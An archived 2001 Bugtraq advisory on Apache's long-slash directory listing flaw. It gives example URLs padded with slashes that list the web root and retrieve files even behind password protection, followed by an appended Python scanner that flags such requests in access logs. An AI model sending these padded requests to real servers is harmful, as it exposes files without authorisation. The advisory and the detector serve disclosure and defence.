[21901] in bugtraq


Apache Artificially Long Slash Path Directory Listing Vulnerabili

daemon@ATHENA.MIT.EDU (Brian Dinello)
Thu Jul 26 18:17:28 2001

Message-ID: <9B515520AA3CD411B36900508B6636B508F8C9B2@mi8nycmail02.mi8.com>
From: Brian Dinello <brian.dinello@vigilantminds.com>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Thu, 26 Jul 2001 11:55:16 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Apache Artificially Long Slash Path Directory Listing Vulnerability
BUGTRAQ ID 2503

I'm not really sure if this is a known issue, but here goes:

Old news:  As the vulnerability's description describes, any user
with a web browser can obtain a directory listing of the Apache http
root directory, even if the directory contains an index.html file and
is password protected.

New news: You can access files/directories under the http root by
subtracting the number of slashes from the appended url equal to the
number of characters in the file or directory name you are attempting
to access.  Example:

Standard Directory List:
http://15.16.17.18////////////////////////////////////////////////////
////////////////

Download an Arbitrary file:
http://15.16.17.18////////////////////////////////////////////////////
////thisfile.txt

Or In a Directory:
http://15.16.17.18////////////////////////////////////////////////subd
ir1/thisfile.txt

I've made no attempt to contact The Apache Group to discuss this as
it is the result of a known vulnerability and patches have already
been released to fix vulnerable systems.

Brian Dinello
Security Consultant
VigilantMinds, Inc.
brian.dinello@vigilantminds.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO2A9ma1dkgK5UcWTEQIa4wCfXK2NheBMvCb67CSOXBGpGoXEkfsAoNOC
ZjyC05S8XddgUvLifLIIvx2o
=Fz1o
-----END PGP SIGNATURE-----
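
A log check for the request pattern described in the message above, added here as an example and not part of the original post: it flags access-log entries whose path contains a long run of slashes and reports what the padding was attached to. The 16-slash threshold, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Apache Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
THRESHOLD = 16  # assumed cut-off; ordinary URLs rarely contain more than "//"

def scan(lines, threshold=THRESHOLD):
    """Return one finding per request whose path holds a long run of slashes."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log entry
        # Drop the query string and decode %2F so encoded slashes are counted too.
        path = unquote(m["path"].split("?", 1)[0])
        run = max((len(r) for r in re.findall(r"/+", path)), default=0)
        if run < threshold:
            continue
        resource = re.sub(r"/{2,}", "/", path)  # path with the slash runs collapsed
        findings.append({
            "ip": m["ip"],
            "slashes": run,
            "resource": resource,
            "kind": "listing" if resource == "/" else "resource",
            "served": m["status"].startswith("2"),  # 2xx: the server answered it
        })
    return findings

def _line(ip, path, status):
    """Build one constructed Common Log Format entry."""
    return f'{ip} - - [26/Jul/2001:12:00:00 -0400] "GET {path} HTTP/1.0" {status} 512'

# Constructed sample entries (documentation-range addresses, not real traffic).
SAMPLE = [
    _line("192.0.2.10", "/index.html", 200),
    _line("192.0.2.77", "/" * 68, 200),
    _line("192.0.2.77", "/" * 56 + "thisfile.txt", 200),
    _line("192.0.2.77", "/" * 48 + "subdir1/thisfile.txt", 403),
    _line("192.0.2.10", "/docs//readme.txt", 200),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Entries with `served` set to true are the ones to follow up first, since the server answered the padded request with a success status.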
